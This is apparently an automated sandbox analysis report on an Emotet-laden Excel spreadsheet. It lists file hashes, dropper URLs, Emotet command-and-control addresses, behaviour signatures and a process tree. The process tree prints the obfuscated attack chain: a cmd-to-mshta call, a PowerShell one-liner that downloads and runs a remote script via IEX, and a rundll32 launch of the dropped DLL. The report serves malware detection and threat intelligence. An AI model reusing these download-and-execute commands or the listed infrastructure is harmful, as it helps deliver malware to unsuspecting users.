Analysis

  • max time kernel
    59s
  • max time network
    32s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 02:17

General

  • Target

    2022-1-28-2c3f20f85f0deb5c757099154b411f05.xls

  • Size

    46KB

  • MD5

    2c3f20f85f0deb5c757099154b411f05

  • SHA1

    6cc82d236555536f649f70a0a20e8a0330cd7bc8

  • SHA256

    48d2b8e9f891fe7810718c9c7a877e7fc8999fa7003b61b47e0319315a9bde06

  • SHA512

    b8538c87b9bec2386e2c3c2aac336d7207694c7d5c6832cce3ed32dd09e242f3a59bb7547547c2822d7cc60abefb2eff81550ae04cf24d0167f34957863af748

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/vvv/ppp/fe.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/vvv/ppp/fe.png

Extracted

Family

emotet

Botnet

Epoch4

C2

51.15.4.22:443

173.214.173.220:8080

212.237.5.209:443

192.254.71.210:443

216.158.226.206:443

162.243.175.63:443

212.24.98.99:8080

58.227.42.236:80

45.118.115.99:8080

104.251.214.46:8080

185.157.82.209:8080

46.55.222.11:443

188.40.137.206:8080

81.0.236.90:443

103.75.201.2:443

129.232.188.93:443

195.154.133.20:443

159.8.59.82:8080

79.172.212.216:8080

138.185.72.26:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 17 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\2022-1-28-2c3f20f85f0deb5c757099154b411f05.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2476
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1716
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/vvv/ppp/fe.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:1228
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1544
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2672
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,BBDD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:3168
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                PID:1712
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1228 -s 1628
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4088

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    680e278a0ce15adb1f86895622735c6e

    SHA1

    319d16f64ab5b9a15a9473b2437dcd81643bd2b8

    SHA256

    0e9f1ff1c80bd72100bde95b3215c42b4c71d988468f25696bbf5a0cb1606da1

    SHA512

    3e80ee08abcd85a9e1cd31ba59bd418915147dd07c667a526fbb81cb7344a0034ad0a46cca41f8ac251d414d9e15843b87c8d874c331865733337162bd762352

  • \ProgramData\QWER.dll
    MD5

    680e278a0ce15adb1f86895622735c6e

    SHA1

    319d16f64ab5b9a15a9473b2437dcd81643bd2b8

    SHA256

    0e9f1ff1c80bd72100bde95b3215c42b4c71d988468f25696bbf5a0cb1606da1

    SHA512

    3e80ee08abcd85a9e1cd31ba59bd418915147dd07c667a526fbb81cb7344a0034ad0a46cca41f8ac251d414d9e15843b87c8d874c331865733337162bd762352

  • \ProgramData\QWER.dll
    MD5

    680e278a0ce15adb1f86895622735c6e

    SHA1

    319d16f64ab5b9a15a9473b2437dcd81643bd2b8

    SHA256

    0e9f1ff1c80bd72100bde95b3215c42b4c71d988468f25696bbf5a0cb1606da1

    SHA512

    3e80ee08abcd85a9e1cd31ba59bd418915147dd07c667a526fbb81cb7344a0034ad0a46cca41f8ac251d414d9e15843b87c8d874c331865733337162bd762352

  • memory/1544-309-0x000001DFE10A0000-0x000001DFE1116000-memory.dmp
    Filesize

    472KB

  • memory/1544-326-0x000001DFC8810000-0x000001DFE09E0000-memory.dmp
    Filesize

    385.8MB

  • memory/1544-319-0x000001DFC8810000-0x000001DFE09E0000-memory.dmp
    Filesize

    385.8MB

  • memory/1544-314-0x000001DFC8810000-0x000001DFE09E0000-memory.dmp
    Filesize

    385.8MB

  • memory/1544-279-0x000001DFE09E0000-0x000001DFE0A02000-memory.dmp
    Filesize

    136KB

  • memory/1544-298-0x000001DFE0B90000-0x000001DFE0BCC000-memory.dmp
    Filesize

    240KB

  • memory/1712-330-0x00000000042D0000-0x00000000042F5000-memory.dmp
    Filesize

    148KB

  • memory/1712-332-0x00000000044C0000-0x00000000044E5000-memory.dmp
    Filesize

    148KB

  • memory/1712-341-0x0000000004C00000-0x0000000004C25000-memory.dmp
    Filesize

    148KB

  • memory/1712-339-0x0000000004BA0000-0x0000000004BC5000-memory.dmp
    Filesize

    148KB

  • memory/1712-337-0x0000000004B40000-0x0000000004B65000-memory.dmp
    Filesize

    148KB

  • memory/1712-335-0x00000000049D0000-0x00000000049F5000-memory.dmp
    Filesize

    148KB

  • memory/2476-118-0x00007FF7E0830000-0x00007FF7E0840000-memory.dmp
    Filesize

    64KB

  • memory/2476-116-0x00007FF7E0830000-0x00007FF7E0840000-memory.dmp
    Filesize

    64KB

  • memory/2476-115-0x00007FF7E0830000-0x00007FF7E0840000-memory.dmp
    Filesize

    64KB

  • memory/2476-117-0x00007FF7E0830000-0x00007FF7E0840000-memory.dmp
    Filesize

    64KB

  • memory/2476-129-0x00007FF7DCCC0000-0x00007FF7DCCD0000-memory.dmp
    Filesize

    64KB

  • memory/2476-119-0x00007FF7E0830000-0x00007FF7E0840000-memory.dmp
    Filesize

    64KB

  • memory/2476-128-0x00007FF7DCCC0000-0x00007FF7DCCD0000-memory.dmp
    Filesize

    64KB

  • memory/3168-328-0x0000000003510000-0x0000000003535000-memory.dmp
    Filesize

    148KB

  • memory/3168-327-0x0000000003511000-0x0000000003532000-memory.dmp
    Filesize

    132KB